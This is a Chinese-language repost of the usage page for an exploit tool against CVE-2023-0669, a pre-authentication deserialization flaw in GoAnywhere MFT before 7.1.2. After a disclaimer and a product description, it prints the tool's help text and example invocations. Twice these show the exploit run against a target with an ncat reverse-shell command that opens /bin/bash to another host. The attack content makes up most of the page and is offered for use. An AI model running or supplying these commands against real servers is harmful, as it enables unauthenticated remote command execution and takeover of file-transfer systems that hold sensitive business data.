CVE-2023-0669 GoAnywhere MFT反序列化漏洞利用工具
免责声明
文中提到的所有技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则产生的一切后果自行承担,与本文作者无关!
GoAnywhereMFT
GoAnywhereMFT是一个管理文件传输的解决方案,它简化了系统、员工、客户和贸易伙伴之间的数据交换。它通过广泛的安全设置、详细的审计跟踪提供集中控制,并帮助将文件中的信息处理为XML、EDI、CSV和JSON数据库。
CVE-2023-0669
GoAnywhereMFT管理端存在反序列化漏洞,攻击者利用该漏洞无需登录便可以远程执行任意命令。漏洞被追踪为CVE-2023-0669。
影响范围
GoAnywhereMFT小于7.1.2版本
漏洞复现
工具使用说明:
java -jar CVE-2023-0669.jar -h
_______ ________ ___ ____ ___ _____ ____ _____ _____ ____ / ____/ | / / ____/ |__ \ / __ \__ \|__ / / __ \/ ___// ___// __ \ / / | | / / __/________/ // / / /_/ / /_ <______/ / / / __ \/ __ \/ /_/ / / /___ | |/ / /__/_____/ __// /_/ / __/___/ /_____/ /_/ / /_/ / /_/ /\__, / \____/ |___/_____/ /____/\____/____/____/ \____/\____/\____//____/ GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object. usage: Options -c,--command <arg> Expected commands to be executed -e,--encrypt <arg> Encrypt the specified deserialized content -h,--help Print help information -p,--proxy <arg> Proxy Address, eg: http://127.0.0.1:8080 -path <arg> Target Endpoint, default: /goanywhere/lic/accept -t,--target <arg> Target URL -v,--version <arg> Version Encryption, 1/2, default: 1 Example: java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t https://192.168.1.1 -c 'ncat -e /bin/bash 192.168.1.2 4444' java -jar CVE-2023-0669.jar -e ./payload.ser
使用命令反弹shell:
java -jar CVE-2023-0669.jar -p http://127.0.0.1:8080 -t http://192.168.1.1:8000 -c 'ncat -e /bin/bash 192.168.1.2 44445'
声明:本站所有文章资源内容,如无特殊说明或标注,均为采集网络资源。如若本站内容侵犯了原著者的合法权益,可联系本站删除。